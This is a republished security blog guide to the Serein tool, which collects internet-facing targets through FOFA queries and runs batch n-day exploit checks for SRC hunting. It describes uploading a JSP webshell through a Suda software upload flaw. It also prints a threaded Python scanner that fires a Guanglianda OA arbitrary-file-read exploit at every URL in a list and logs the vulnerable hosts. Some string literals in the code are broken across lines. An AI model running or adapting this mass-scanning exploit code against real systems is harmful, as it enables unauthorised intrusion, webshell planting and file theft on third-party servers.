Batch SRC Mining with Serein: A Complete Setup and Usage Guide

This article walks through installing the Serein tool, configuring FOFA API keys, collecting target URLs, running nday vulnerability checks, adding custom POCs, and filtering results with domain and weight lookups to automate large‑scale SRC exploitation.

Black & White Path
Black & White Path
Black & White Path
Batch SRC Mining with Serein: A Complete Setup and Usage Guide

Tool Overview

Serein is a graphical Python tool for batch collection of URLs and batch nday vulnerability testing. It can be used for source code repository (SRC) mining, CNVD discovery, 0‑day exploitation, and building a personal weapon library.

Installation

Clone the repository from https://github.com/W01fh4cker/Serein, then install the Python dependencies with pip install -r requirements.txt (or simply pip install as indicated). The tool launches immediately after dependencies are installed.

Configuration

Configure a FOFA API key (membership required) by replacing the placeholder in the configuration file with your own key. Any other domain‑reversal or weight‑checking API can be used in place of FOFA.

Typical Workflow

Use FOFA to collect target URLs (e.g., app="速达软件-公司产品" for the DesignReportSave file‑upload vulnerability).

The collected IPs are automatically prefixed with http:// and https://.

Feed the URLs to the nday module; select the corresponding vulnerability module to run the custom POC.

Vulnerable URLs are written to a .txt file.

Optionally perform reverse‑domain lookup and weight queries to prioritize assets.

Example: DesignReportSave File‑Upload Vulnerability

The FOFA query app="速达软件-公司产品" returns a list of IPs. After adding protocol prefixes, the nday module launches a custom POC (original source at https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Fileupload/suda). Successful exploitation uploads a JSP webshell, which is confirmed by accessing the uploaded file. Subsequent steps include reverse‑domain lookup and a weight‑query to filter low‑relevance entries.

Adding New POCs

New POCs can be integrated by adapting existing ones and placing them in Serein’s POC directory. The tool then lists the added module in the GUI.

GUI Batch Scanner

A Python GUI script reads URLs from 修正后的url.txt, creates a thread pool (default 30 workers) using ThreadPoolExecutor, sends POST requests to each target, and logs successful detections to 存在广联达OA系统任意文件读取url.txt. Real‑time results are displayed with tkinter and scrolledtext widgets.

import requests
import tkinter as tk
from tkinter import scrolledtext
from concurrent.futures import ThreadPoolExecutor
from ttkbootstrap.constants import *
import json

def yync_exp(url):
    url1 = url + "/m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=ReadAllBytes"
    head = {'Content-Type': 'application/json'}
    data = '["C:\\Windows\\win.ini"]'
    try:
        res = requests.post(url1, json=data, headers=head, timeout=3)
        if "59" in res.text:
            yync_rce_text.insert(END, "【*】存在漏洞的url:" + url + "
")
            yync_rce_text.see(END)
            with open("存在广联达OA系统任意文件读取url.txt", 'a') as f:
                f.write(url + "
")
        else:
            yync_rce_text.insert(END, "【×】不存在漏洞的url:" + url + "
")
            yync_rce_text.see(END)
    except Exception as err:
        yync_rce_text.insert(END, "【×】目标请求失败,报错内容:" + str(err) + "
")
        yync_rce_text.see(END)

def get_yync_addr():
    with open("修正后的url.txt","r") as f:
        for address in f.readlines():
            address = address.strip()
            yield address

def fileread_gui():
    yync_rce = tk.Tk()
    yync_rce.geometry("910x450")
    yync_rce.title("广联达OA系统任意文件读取")
    yync_rce.resizable(0, 0)
    yync_rce.iconbitmap('logo.ico')
    global yync_rce_text
    yync_rce_text = scrolledtext.ScrolledText(yync_rce, width=123, height=25)
    yync_rce_text.grid(row=0, column=0, padx=10, pady=10)
    yync_rce_text.see(END)
    addrs = get_yync_addr()
    max_thread_num = 30
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    for addr in addrs:
        executor.submit(yync_exp, addr)
    yync_rce.mainloop()

Limitations and Extension

Pure nday scanning is insufficient for large‑scale SRC mining. For newer vulnerabilities or CVEs, users should obtain fresh exploits from public vulnerability wikis, adapt the POCs, and run batch scans using Serein’s built‑in filtering (reverse‑domain and weight checks).

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

vulnerability scanningPython GUIFOFAcustom POCnday detectionSereinSRC mining
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.